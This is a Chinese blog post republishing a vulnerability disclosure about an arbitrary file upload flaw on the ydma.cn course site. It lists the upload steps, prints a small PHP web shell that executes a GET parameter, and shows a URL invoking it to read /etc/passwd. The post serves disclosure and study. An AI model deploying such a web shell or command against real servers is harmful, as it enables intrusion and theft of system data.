【漏洞学习——任意文件上传】LAMP兄弟连旗下猿代码存在任意上传文件漏洞

最新推荐文章于 2024-07-29 09:37:33 发布
最新推荐文章于 2024-07-29 09:37:33 发布
阅读量392 收藏
点赞数
分类专栏: 【渗透测试实战】 # 乌云漏洞案例学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/84647277
版权

漏洞细节

输入网址:http://www.ydma.cn/ 
1、随意注册一个账号
2、购买任意免费课程
3、进入该课程的讨论区
4、点击发表话题,点击上传图片。

<?php
	$x = shell_exec($_GET['XX']);
	var_dump($x);
?>

复制返回地址到浏览器打开。
例如:http://www.ydma.cn/files/image/2015/11-18/765506617564c41053996b.php
or :http://www.ydma.cn/files/image/2015/11-18/1889937821564c46536c47e.php?XX=cat%20/etc/passwd
======================
我只是友情测试漏洞,并未深入

参见:https://bugs.shuimugan.com/bug/view?bug_no=154170

 

FLy_鹏程万里
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
任意文件上传
m0_56578216的博客
08-31 172
文件上传是Web 应用必备功能之一,如,头像上传,附件分享等。如果服务器配置不当或者没有进行足够的过滤,Web 用户就可以上传任意文件,包括恶意脚本文件,exe 程序等等,这就造成了任意文件上传漏洞。如果服务器配置不当或没有进行足够的对文件的验证和过滤(根据后缀名、内容、类型检测过滤),导致用户可以上传任意文件,包括恶意的脚本文件,这就是任意文件上传漏洞
[LAMP兄弟连]HTML5视频教程(12集)
07-22
教程名称: [LAMP兄弟连]HTML 5视频教程(12集)【】[LAMP兄弟连]HTML 5视频教程-1【】[LAMP兄弟连]HTML 5视频教程-2【】[LAMP兄弟连]HTML 5视频教程-3【】[LAMP兄弟连]HTML 5视频教程-4【】[LAMP兄弟连]HTML 5视频...
技术干货 | 针对Spring-Boot 框架漏洞的初探
最新发布
2301_80127209的博客
07-29 2295
这篇文章主要是给师傅们介绍下Spring-Boot 框架漏洞的打法以及主要对于Spring-Boot漏洞的接口泄露信息进行一个分析,后面使用了曾哥的Spring-Boot漏洞扫描工具,可以很大减轻我们对于这个漏洞接口的分析。
文件任意上传
一个普普通通的博客
03-15 1185
文件上传任意上传
Lamp兄弟连细说PHP全部课件和代码
05-27
Lamp兄弟连细说PHP】是一门针对初学者和进阶者的PHP编程课程,旨在全面讲解PHP在LAMP(Linux、Apache、MySQL、PHP)环境下的应用与开发。这门课程涵盖了从基础语法到高级特性的广泛内容,旨在帮助学习者掌握PHP...
LAMP兄弟连—职业素质培训视频教程
07-22
教程名称:LAMP兄弟连—职业素质培训视频教程课程目录:【】第1讲 积极的心态(上)【】第1讲 积极的心态(下)【】第3讲 简历技巧(上)【】第3讲 简历技巧(下)【】第4讲 面试技巧(上)【】第4讲 面试技巧(下)...
LAMP兄弟连教学课件
10-28
**LAMP兄弟连教学课件**是一套针对初学者和进阶者精心设计的课程资料,专注于PHP web开发。LAMP是Linux、Apache、MySQL和PHP的缩写,这是一个广泛用于构建动态网站和Web应用程序的技术栈。这个压缩包包含了一系列PDF...
uploadlabs靶场文件
02-27
【标题】:“uploadlabs靶场文件”是...总结来说,“uploadlabs靶场文件”提供了一个实践和学习文件上传安全的平台,通过在LAMP环境中部署并访问,用户可以深入理解文件上传漏洞的原理及其防范措施,提升网络安全技能。
spring-boot-upload-file-lead-to-rce-tricks:spring boot Fat Jar 应用文件上传漏洞到 RCE 的利用技巧
04-12
spring-boot-upload-file-lead-to-rce-tricks 一. docker 漏洞环境搭建 docker pull landgrey/spring-boot-fat-jar-write-file-rce:1.2 docker run -d -p 18081:18081 landgrey/spring-boot-fat-jar-write-file-rce:1.2 完成后访问 二. 相关文章 三. 常见 JDK 目录收集 欢迎提 issue 补充:clapping_hands:~ /usr/lib/jvm/java-8-oracle/jre/lib/ /usr/lib/jvm/java-1.8-openjdk/jre/lib/ /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ 四. docker 漏洞环境的功能 文件上传功能 (默认上传到 /tmp/ 目录,
4.任意文件上传
qq_45926195的博客
10-29 1182
4.1什么是任意文件上传 大多数网站都有文件上传的接口,但如果在后台开发时并没有对上传的文件进行安全考虑或采用了有缺陷的措施,导致攻击者可以通过一些手段绕过安全措施从而上传一些恶意文件,从而通过该恶意文件的访问来控制整个后台 4.2文件上传的绕过方式 一般分为客户端和服务端 客户端是js绕过 用burpsuite抓个包改一下扩展名试一下,服务端绕过分为检查后缀,检查内容,和其他绕过。检查后缀主要是黑名单和白名单绕过 ,黑名单的话 ,上传特殊解析后缀、后缀大小写绕过、点绕过、空格绕过、::$DATA绕.
dedecms后台文件任意上传漏洞(media_add.php)
L_melody的博客
01-19 2233
文件:media_add.php 路径:.../dede/media_add.php 解决方案: 查找文件位置:/dede/media_add.php,大概在69行左右,找到: $fullfilename = $cfg_basedir.$filename; 修改为: if (preg_match('#\.(php|pl|cgi|asp|aspx|jsp|php5|php4|php...
dedecms 漏洞_源起网——dedecms后台文件任意上传漏洞
weixin_39722917的博客
11-29 224
源起网 - 做专业.全面的网站源码模板下载站!​source.aiconvert.cn漏洞dedecms后台文件任意上传漏洞简介dedecms早期版本后台存在大量的富文本编辑器,该控件提供了一些文件上传接口,同时dedecms对上传文件的后缀类型未进行严格的限制,这导致了黑客可以上传WEBSHELL,获取网站后台权限。文件/dede/media_add.php修复打开 /dede/media_ad...
Tomcat任意文件上传(CVE-2017-12615)
m0_73720136的博客
05-07 1192
掌握文件上传中的Tomcat任意文件上传(CVE-2017-12615)漏洞影响的Tomcat版本以及配置文件,利用Burp Suite工具抓取数据包,将数据包内容修改,请求方式修改为PUT方式,上传新建的jsp脚本文件,文件内容可以任意编写,也可以是木马。1. NTFS文件流2. 文件名相关限制可以采取一些方法来绕过限制,比如Windows中文件名不能以空格结尾,在文件名后面加空格"%20",也可以加斜杠"/"。
22-任意文件上传-(一)
XLbb的博客
05-10 871
一、概述 任意文件上传(Arbitrary File Upload)是一种网络安全漏洞漏洞源于应用程序对用户上传文件的不当处理。当系统未能正确验证文件类型、内容或路径时,攻击者便有机可乘,上传携带恶意代码的文件,如Webshell,进而执行任意命令、窃取数据或发起进一步攻击。 二、使用pikachu靶场环境学习测试 1、客户端前端校验(client check): 三、upload-labs靶场环境测试学习
任意文件的上传和下载
2301_79194110的博客
09-20 570
http://10.0.0.130:91/upload/upload/202309121802212705.php3 不能解析。右键复制图片地址http://10.0.0.130:91/upload/upload/3820230913144850.jpg。访问tj.php http://192.168.134.1:90/upload/upload/tj.php。http://10.0.0.130:91/upload/upload/hao.jpg 会被解析为php。
任意文件上传漏洞(CVE-2018-2894)
m0_64118193的博客
10-20 1692
Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在 ‘生产模式’ 下默认不开启
LAMP兄弟连李明老师详解Linux文件系统管理与硬盘分区实战
本篇文档是[LAMP兄弟连李明老师讲Linux]课程的第9讲,专注于Linux文件系统管理。课程涵盖了多个关键知识点,包括Linux文件系统的构成及其命令、硬盘分区及管理、磁盘配额、备份与恢复等内容。 首先,讲解了Linux...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值